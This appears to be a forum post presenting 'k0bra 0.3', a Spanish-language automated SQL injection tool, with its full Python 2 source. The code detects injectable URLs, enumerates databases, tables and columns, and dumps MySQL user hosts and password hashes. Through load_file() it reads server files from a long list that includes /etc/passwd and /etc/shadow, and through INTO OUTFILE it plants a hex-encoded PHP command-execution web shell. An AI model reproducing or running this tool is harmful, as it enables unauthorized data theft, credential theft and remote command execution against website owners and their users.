Autor
Las funciones son las siguientes
- Comprobar vulnerabilidad
- Buscar numero de columnas
- Buscar automaticamente el numero para mostrar datos
- Mostras tablas
- Mostrar columnas
- Mostrar bases de datos
- Mostrar tablas de otra DB
- Mostrar columnas de una tabla de otra DB
- Mostrar usuarios de mysql.user
- Buscar archivos usando load_file
- Mostrar un archivo usando load_file
- Mostrar valores
- Mostrar informacion sobre la DB
- Crear una shell usando outfile
- Todo se guarda en logs ordenados
- Manejo de control+c
Código
#!usr/bin/python
#k0bra 0.3 (C) Doddy Hackman 2011
import os,sys,urllib2,re,binascii
from urlparse import urlparse
files = ["/etc/passwd","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/admin.php","C:/xampp/htdocs/leer.txt","../../../boot.ini","../../../../boot.ini","../../../../../boot.ini","../../../../../../boot.ini","/etc/shadow","/etc/shadow~","/etc/hosts","/etc/motd","/etc/apache/apache.conf","/etc/fstab","/etc/apache2/apache2.conf","/etc/apache/httpd.conf","/etc/httpd/conf/httpd.conf","/etc/apache2/httpd.conf","/etc/apache2/sites-available/default","/etc/mysql/my.cnf","/etc/my.cnf","/etc/sysconfig/network-scripts/ifcfg-eth0","/etc/redhat-release","/etc/httpd/conf.d/php.conf","/etc/pam.d/proftpd","/etc/phpmyadmin/config.inc.php","/var/www/config.php","/etc/httpd/logs/error_log","/etc/httpd/logs/error.log","/etc/httpd/logs/access_log","/etc/httpd/logs/access.log","/var/log/apache/error_log","/var/log/apache/error.log","/var/log/apache/access_log","/var/log/apache/access.log","/var/log/apache2/error_log","/var/log/apache2/error.log","/var/log/apache2/access_log","/var/log/apache2/access.log","/var/www/logs/error_log","/var/www/logs/error.log","/var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","/usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/etc/group","/etc/security/group","/etc/security/passwd","/etc/security/user","/etc/security/environ","/etc/security/limits","/usr/lib/security/mkuser.default","/apache/logs/access.log","/apache/logs/error.log","/etc/httpd/logs/acces_log","/etc/httpd/logs/acces.log","/var/log/httpd/access_log","/var/log/httpd/error_log","/apache2/logs/error.log","/apache2/logs/access.log","/logs/error.log","/logs/access.log","/usr/local/apache2/logs/access_log","/usr/local/apache2/logs/access.log","/usr/local/apache2/logs/error_log","/usr/local/apache2/logs/error.log","/var/log/httpd/access.log","/var/log/httpd/error.log","/opt/lampp/logs/access_log","/opt/lampp/logs/error_log","/opt/xampp/logs/access_log","/opt/xampp/logs/error_log","/opt/lampp/logs/access.log","/opt/lampp/logs/error.log","/opt/xampp/logs/access.log","/opt/xampp/logs/error.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\access.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\error.log","/usr/local/apache/conf/httpd.conf","/usr/local/apache2/conf/httpd.conf","/etc/apache/conf/httpd.conf","/usr/local/etc/apache/conf/httpd.conf","/usr/local/apache/httpd.conf","/usr/local/apache2/httpd.conf","/usr/local/httpd/conf/httpd.conf","/usr/local/etc/apache2/conf/httpd.conf","/usr/local/etc/httpd/conf/httpd.conf","/usr/apache2/conf/httpd.conf","/usr/apache/conf/httpd.conf","/usr/local/apps/apache2/conf/httpd.conf","/usr/local/apps/apache/conf/httpd.conf","/etc/apache2/conf/httpd.conf","/etc/http/conf/httpd.conf","/etc/httpd/httpd.conf","/etc/http/httpd.conf","/etc/httpd.conf","/opt/apache/conf/httpd.conf","/opt/apache2/conf/httpd.conf","/var/www/conf/httpd.conf","/private/etc/httpd/httpd.conf","/private/etc/httpd/httpd.conf.default","/Volumes/webBackup/opt/apache2/conf/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf.default","C:\\ProgramFiles\\ApacheGroup\\Apache\\conf\\httpd.conf","C:\\ProgramFiles\\ApacheGroup\\Apache2\\conf\\httpd.conf","C:\\ProgramFiles\\xampp\\apache\\conf\\httpd.conf","/usr/local/php/httpd.conf.php","/usr/local/php4/httpd.conf.php","/usr/local/php5/httpd.conf.php","/usr/local/php/httpd.conf","/usr/local/php4/httpd.conf","/usr/local/php5/httpd.conf","/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf","/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php","/usr/local/etc/apache/vhosts.conf","/etc/php.ini","/bin/php.ini","/etc/httpd/php.ini","/usr/lib/php.ini","/usr/lib/php/php.ini","/usr/local/etc/php.ini","/usr/local/lib/php.ini","/usr/local/php/lib/php.ini","/usr/local/php4/lib/php.ini","/usr/local/php5/lib/php.ini","/usr/local/apache/conf/php.ini","/etc/php4.4/fcgi/php.ini","/etc/php4/apache/php.ini","/etc/php4/apache2/php.ini","/etc/php5/apache/php.ini","/etc/php5/apache2/php.ini","/etc/php/php.ini","/etc/php/php4/php.ini","/etc/php/apache/php.ini","/etc/php/apache2/php.ini","/web/conf/php.ini","/usr/local/Zend/etc/php.ini","/opt/xampp/etc/php.ini","/var/local/www/conf/php.ini","/etc/php/cgi/php.ini","/etc/php4/cgi/php.ini","/etc/php5/cgi/php.ini","c:\\php5\\php.ini","c:\\php4\\php.ini","c:\\php\\php.ini","c:\\PHP\\php.ini","c:\\WINDOWS\\php.ini","c:\\WINNT\\php.ini","c:\\apache\\php\\php.ini","c:\\xampp\\apache\\bin\\php.ini","c:\\NetServer\\bin\\stable\\apache\\php.ini","c:\\home2\\bin\\stable\\apache\\php.ini","c:\\home\\bin\\stable\\apache\\php.ini","/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini","/usr/local/cpanel/logs","/usr/local/cpanel/logs/stats_log","/usr/local/cpanel/logs/access_log","/usr/local/cpanel/logs/error_log","/usr/local/cpanel/logs/license_log","/usr/local/cpanel/logs/login_log","/var/cpanel/cpanel.config","/var/log/mysql/mysql-bin.log","/var/log/mysql.log","/var/log/mysqlderror.log","/var/log/mysql/mysql.log","/var/log/mysql/mysql-slow.log","/var/mysql.log","/var/lib/mysql/my.cnf","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\data\\mysql-bin.log","C:\\MySQL\\data\\hostname.err","C:\\MySQL\\data\\mysql.log","C:\\MySQL\\data\\mysql.err","C:\\MySQL\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.ini","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.cnf","C:\\ProgramFiles\\MySQL\\my.ini","C:\\ProgramFiles\\MySQL\\my.cnf","C:\\MySQL\\my.ini","C:\\MySQL\\my.cnf","/etc/logrotate.d/proftpd","/www/logs/proftpd.system.log","/var/log/proftpd","/etc/proftp.conf","/etc/protpd/proftpd.conf","/etc/vhcs2/proftpd/proftpd.conf","/etc/proftpd/modules.conf","/var/log/vsftpd.log","/etc/vsftpd.chroot_list","/etc/logrotate.d/vsftpd.log","/etc/vsftpd/vsftpd.conf","/etc/vsftpd.conf","/etc/chrootUsers","/var/log/xferlog","/var/adm/log/xferlog","/etc/wu-ftpd/ftpaccess","/etc/wu-ftpd/ftphosts","/etc/wu-ftpd/ftpusers","/usr/sbin/pure-config.pl","/usr/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.conf","/usr/local/etc/pure-ftpd.conf","/usr/local/etc/pureftpd.pdb","/usr/local/pureftpd/etc/pureftpd.pdb","/usr/local/pureftpd/sbin/pure-config.pl","/usr/local/pureftpd/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.pdb","/etc/pureftpd.pdb","/etc/pureftpd.passwd","/etc/pure-ftpd/pureftpd.pdb","/var/log/pure-ftpd/pure-ftpd.log","/logs/pure-ftpd.log","/var/log/pureftpd.log","/var/log/ftp-proxy/ftp-proxy.log","/var/log/ftp-proxy","/var/log/ftplog","/etc/logrotate.d/ftp","/etc/ftpchroot","/etc/ftphosts","/var/log/exim_mainlog","/var/log/exim/mainlog","/var/log/maillog","/var/log/exim_paniclog","/var/log/exim/paniclog","/var/log/exim/rejectlog","/var/log/exim_rejectlog"]
def installer():
try:
os.mkdir("logs",0777)
except:
pass
def clean():
if sys.platform=="win32":
os.system("cls")
else:
os.system("clear")
def savefile(name,text):
file = open(name,"a")
file.write("\n"+text)
file.close()
def gethost(test):
return urlparse(test).netloc
def header() :
print ""
print ""
print " @ @@ @ "
print "@@ @ @ @@ "
print " @ @@ @ @ @ @ @ @ @@@ "
print " @ @ @ @ @@ @ @@@ @ @ "
print " @@ @ @ @ @ @ @@@ "
print " @ @ @ @ @ @ @ @ @ "
print "@@@ @ @@ @@@ @@@ @@@@@"
print ""
print ""
def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
def toma(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).read()
def bypass(bypass):
if bypass == "--":
return("+","--")
elif bypass == "/*":
return("/**/","/**/")
else:
return("+","--")
def reiniciar():
copyright()
raw_input()
sta()
def dumper(web,passx,table,col1,col2):
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
code1 = toma(web1+pass1+"from"+pass1+table+pass2)
print "\n\n[+] Searching values\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
savefile("logs/"+gethost(web)+".txt","")
savefile("logs/"+gethost(web)+".txt","[+] Values Found in table "+table+" : "+numbers+"\n")
print "[+] Values Found : ",numbers,"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
c1 = re.findall("K0BRA(.*?)K0BRA",code2)
c1 = c1[0]
c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
c2 = c2[0]
print "["+col1+"] : "+c1
print "["+col2+"] : "+c2+"\n"
savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
else:
print "[-] Not Found\n"
def mysqluser(web,passx):
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
print "\n\n[+] Searching mysql.user\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
print "[+] mysql.user : ON"
savefile("logs/"+gethost(web)+".txt","")
savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
print "[+] Users Found : ",numbers,"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
host = re.findall("K0BRA(.*?)K0BRA",code2)
host = host[0]
user = re.findall("K0BRA1(.*?)K0BRA1",code2)
user = user[0]
passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
passw = passw[0]
savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
savefile("logs/"+gethost(web)+".txt","[User] : "+user)
savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
print "[Host] : "+host
print "[User] : "+user
print "[Pass] : "+passw+"\n"
else:
print "[-] Not Found\n"
def showcolumnsdb(web,db,table,passx):
db2 = db
table2 = table
db = "0x"+str(binascii.hexlify(db))
table = "0x"+str(binascii.hexlify(table))
pass1,pass2 = bypass(passx)
savefile("logs/"+gethost(web)+".txt","")
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
print "\n\n[+] Searching columns in DB\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
print "[+] information_schema : ON"
print "[+] Columns Found : ",numbers,"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
column = re.findall("K0BRA(.*?)K0BRA",code2)
column = column[0]
savefile("logs/"+gethost(web)+".txt","[Column Found in table "+table2+" in DB "+table2+"] : "+column)
print "[Column Found] : "+column
else:
print "[-] Not Found\n"
def showtablesdb(web,db,passx):
db2 = db
db = "0x"+str(binascii.hexlify(db))
pass1,pass2 = bypass(passx)
savefile("logs/"+gethost(web)+".txt","")
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
print "\n\n[+] Searching tables in DB\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
print "[+] information_schema : ON"
print "[+] Tables Found : ",numbers,"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
table = re.findall("K0BRA(.*?)K0BRA",code2)
table = table[0]
print "[Table Found] : "+table
savefile("logs/"+gethost(web)+".txt","[Table Found in DB "+db2+"] : "+table)
else:
print "[-] Not Found\n"
def showtables(web,passx):
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
print "\n\n[+] Searching tables\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
savefile("logs/"+gethost(web)+".txt","")
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
print "[+] information_schema : ON"
print "[+] Tables Found : ",numbers,"\n"
for counter in range(17,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
table = re.findall("K0BRA(.*?)K0BRA",code2)
table = table[0]
print "[Table Found] : "+table
savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
else:
print "[-] Not Found\n"
def showcolumns(tabla,web,passx):
pass1,pass2 = bypass(passx)
tabla2 = tabla
tabla = "0x"+str(binascii.hexlify(tabla))
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
print "\n\n[+] Searching columns\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
savefile("logs/"+gethost(web)+".txt","")
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
print "[+] information_schema : ON"
print "[+] Columns Found : ",numbers,"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
column = re.findall("K0BRA(.*?)K0BRA",code2)
column = column[0]
print "[Column Found in table "+tabla2+"] : "+column
savefile("logs/"+gethost(web)+".txt","[Column Found in table "+tabla2+"] : "+column)
else:
print "[-] Not Found\n"
def showdbs(web,passx):
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
print "\n\n[+] Searching DBS\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
savefile("logs/"+gethost(web)+".txt","")
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
print "[+] information_schema : ON"
print "[+] DBS Found : ",numbers,"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
db = re.findall("K0BRA(.*?)K0BRA",code2)
db = db[0]
print "[DB Found] : "+db
savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
else:
print "[-] Not Found\n"
def men():
print "\n[+] Press any key to continue\n"
raw_input()
menu(page,bypass)
def fuzz(web,bypassx):
print "\n[+] Fuzzing files with load_file()\n"
pass1,pass2 = bypass(bypassx)
for archivos in files:
nombre = archivos
file = "0x"+str(binascii.hexlify(archivos))
web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)
code = toma(web1)
if (re.findall("k0bra(.*?)k0bra",code,re.S)):
algo = re.findall("k0bra(.*?)k0bra",code,re.S)
print "\n[File Found] : ",nombre
print "\n[Source Start]\n"
print algo[0]
print "\n[Source End]"
savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
savefile("logs/"+gethost(web)+".txt",algo[0])
savefile("logs/"+gethost(web)+".txt","\n[Source End]")
print "\n[+] Finished\n"
def fuzzfile(web,bypassx):
pass1,pass2 = bypass(bypassx)
archivos = raw_input("\n[File To load] : ")
nombre = archivos
file = "0x"+str(binascii.hexlify(archivos))
web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)
code = toma(web1)
if (re.findall("k0bra(.*?)k0bra",code,re.S)):
algo = re.findall("k0bra(.*?)k0bra",code,re.S)
print "\n\n[File Found] : ",nombre
print "\n[Source Start]\n"
print algo[0]
print "\n[Source End]"
savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
savefile("logs/"+gethost(web)+".txt",algo[0])
savefile("logs/"+gethost(web)+".txt","\n[Source End]")
else:
print "\n\n[-] Error"
def into(web,passx):
pass1,pass2 = bypass(passx)
dira = raw_input("\n\n[Full Source Discloure] : ")
diro = raw_input("\n[Directory to test] : ")
linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
lugar = dira+"/cmd.php"
lugardos = diro+"/cmd.php"
webtest = "http://"+gethost(web)+lugardos
web1 = re.sub("hackman",linea,web)
formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
toma(formandoweb)
code = toma(webtest)
if (re.findall("Mini Shell By Doddy",code)):
print "\n\n[shell up] : "+webtest
savefile("logs/"+gethost(web)+".txt","\n[shell up] : "+webtest)
else:
print "\n\n[-] Error"
def menu(page,bypass):
clean()
header()
print "\n[+] Target : ",page,"\n"
print "\n[information_schema]\n"
print "1 - Show tables"
print "2 - Show columns of the a table"
print "3 - Show databases"
print "4 - Show tables from the a DB"
print "5 - Show columns from the a table of the DB"
print "\n[mysql.user]\n"
print "6 - Show users"
print "\n[Others]\n"
print "7 - Show details"
print "8 - Dump data"
print "9 - Fuzz Files with load_file"
print "10 - Load files with load_file"
print "11 - Create Shell"
print "12 - Show log"
print "13 - Change target"
print "14 - Exit\n\n"
try:
op = input("[Option] : ")
if op == 1:
showtables(page,bypass)
men()
elif op == 2:
table = raw_input("\n\n[Table] : ")
showcolumns(table,page,bypass)
men()
elif op == 3:
showdbs(page,bypass)
men()
elif op == 4:
db = raw_input("\n\n[DB] : ")
showtablesdb(page,db,bypass)
men()
elif op == 5:
db = raw_input("\n\n[DB] : ")
table = raw_input("\n\n[Table] : ")
showcolumnsdb(page,db,table,bypass)
men()
elif op == 6:
mysqluser(page,bypass)
men()
elif op == 7:
more(page,bypass)
men()
elif op == 8:
table = raw_input("\n\n[Table] : ")
col1 = raw_input("\n\n[Column 1] : ")
col2 = raw_input("\n\n[Column 2] : ")
dumper(page,bypass,table,col1,col2)
men()
elif op == 9:
fuzz(page,bypass)
men()
elif op == 10:
fuzzfile(page,bypass)
men()
elif op == 11:
into(page,bypass)
men()
elif op == 12:
os.system("start logs/"+gethost(page)+".txt")
menu(page,bypass)
elif op == 13:
sta()
elif op == 14:
sys.exit(1)
else:
menu(page,bypass)
except:
menu(page,bypass)
def more(web,passx):
pass1,pass2 = bypass(passx)
otraweb = web
print "\n[+] Searching more data\n"
hextest = "0x2f6574632f706173737764"
web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
code0 = toma(web1+pass2)
if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
datar = re.split("K0BRA",datax[0])
savefile("logs/"+gethost(web)+".txt","")
print "[+] Username :",datar[1]
print "[+] Database :",datar[2]
print "[+] Version :",datar[3],"\n"
savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
if (re.findall("K0BRA",code1)):
print "[+] mysql.user : on"
savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
if (re.findall("K0BRA",code2)):
print "[+] information_schema.tables : on"
savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")
codetres = toma(web2)
if (re.findall("ERTOR854",codetres)):
print "[+] load_file() : on"
savefile("logs/"+gethost(web)+".txt","[+] load_file() : on")
def findlength(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Finding columns length"
number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
for te in range(2,30):
number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code)):
numbers = re.findall("K0BRA(.*?)K0BRA",code)
print "[+] Column length :",te
print "[+] Numbers",numbers,"print data"
sql = ""
tex = te + 1
for sqlix in range(2,tex):
sql = str(sql)+","+str(sqlix)
sqli = str(1)+sql
sqla = re.sub(numbers[0],"hackman",sqli)
savefile("logs/"+gethost(web)+".txt","\n[Target] : "+web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla+"\n")
menu(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
print "[-] Length dont found\n"
reiniciar()
def scan(web,passx):
pass1,pass2 = bypass(passx)
print "\n\n[+] Testing vulnerability"
code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)
if not code==codedos:
print "[+] SQLI Detected"
findlength(web,passx)
else:
print "[-] Not Vulnerable"
op = raw_input("\n[+] Scan anyway y/n : ")
if op == "y":
findlength(web,passx)
elif op == "n":
reiniciar()
else:
reiniciar()
def sta():
clean()
header()
web = raw_input("\n\n[Page] : ")
bypasx = raw_input("\n\n[Bypass] : ")
if (re.findall("hackman",web,re.I)):
menu(web,bypasx)
else:
try:
scan(web,bypasx)
except:
print "\n[-] Web offline"
reiniciar()
installer()
sta()
#The End
En línea
